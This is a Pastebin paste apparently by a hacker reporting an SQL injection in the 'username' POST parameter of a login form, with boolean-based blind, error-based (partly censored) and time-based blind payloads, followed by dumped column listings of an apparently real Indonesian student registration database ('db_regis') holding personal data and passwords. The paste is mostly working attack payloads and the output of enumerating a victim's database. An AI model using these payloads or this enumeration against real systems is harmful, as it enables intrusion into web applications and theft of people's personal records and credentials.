SHARE
TWEET

By brew

ambrew_n00bz Apr 23rd, 2019 141 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. Bug TYPE : SQL injection
  2. Parameter: username (POST)
  3.     TYPE: boolean-based blind
  4.     Title: OR boolean-based blind - WHERE OR HAVING clause (NOT)
  5.     Payload: username=Tuyul' OR NOT 8292=8292-- sAhE&password=Tuyul
  6.  
  7.    Type: error-based
  8.    Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
  9.    Payload: xxxx=xxxx' OR (xXXxxM(SELECT xxx(*),xxx(xxxx,(SELECT (ELT(1543=1543,1))),xxxx,FLxxOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- Xxxx sorry Sensored :P
  10.  
  11.     TYPE: time-based blind
  12.     Title: MySQL >= 5.0.12 OR time-based blind
  13.     Payload: username=Tuyul' OR SLEEP(5)-- yTnA&password=Tuyul
  14. ===========================================================================================================================
  15. Database: db_regis
  16. Table: pendaftaran
  17. [44 columns]
  18. +------------------------+--------------+
  19. | Column                 | Type         |
  20. +------------------------+--------------+
  21. | agama                  | varchar(15)  |
  22. | alamat                 | varchar(100) |
  23. | alamat_ortu            | varchar(50)  |
  24. | alamat_perusahaan      | varchar(50)  |
  25. | alamat_perusahaan_ortu | varchar(100) |
  26. | bekerja                | varchar(20)  |
  27. | bukti                  | varchar(200) |
  28. | email                  | varchar(100) |
  29. | foto                   | varchar(200) |
  30. | id                     | int(11)      |
  31. | instansi               | varchar(30)  |
  32. | jabatan                | varchar(30)  |
  33. | jabatan_ortu           | varchar(30)  |
  34. | jk                     | varchar(15)  |
  35. | jurusan                | varchar(30)  |
  36. | kabupaten              | varchar(30)  |
  37. | kabupaten_ortu         | varchar(30)  |
  38. | kode_pos               | varchar(10)  |
  39. | kode_pos_ortu          | varchar(30)  |
  40. | nama                   | varchar(50)  |
  41. | nama_ortu              | varchar(50)  |
  42. | no_ijazah              | varchar(20)  |
  43. | no_pendaftaran         | varchar(20)  |
  44. | password               | varchar(50)  |
  45. | pekerjaan_ortu         | varchar(30)  |
  46. | perusahaan             | varchar(30)  |
  47. | perusahaan_ortu        | varchar(30)  |
  48. | pilihan_1              | varchar(30)  |
  49. | pilihan_2              | varchar(30)  |
  50. | provinsi               | varchar(30)  |
  51. | provinsi_ortu          | varchar(30)  |
  52. | slta                   | varchar(30)  |
  53. | slta_di                | varchar(30)  |
  54. | status                 | varchar(20)  |
  55. | tahun                  | varchar(4)   |
  56. | tempat_lahir           | varchar(30)  |
  57. | tgl_ijazah             | date         |
  58. | tgl_lahir              | date         |
  59. | tgl_pendaftaran        | date         |
  60. | tlp                    | varchar(20)  |
  61. | tlp_ortu               | varchar(15)  |
  62. | tlp_perusahaan_ortu    | varchar(15)  |
  63. | waktu_kuliah           | varchar(20)  |
  64. | wn                     | varchar(15)  |
  65. +------------------------+--------------+
  66.  
  67. Database: db_regis
  68. Table: users
  69. [4 columns]
  70. +--------------+---------------+
  71. | Column       | Type          |
  72. +--------------+---------------+
  73. | img          | varchar(1000) |
  74. | nama_lengkap | varchar(100)  |
  75. | password     | varchar(50)   |
  76. | username     | varchar(50)   |
  77. +--------------+---------------+
  78.  
  79. Contact:  ambrew.n00bz@gmail.com
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top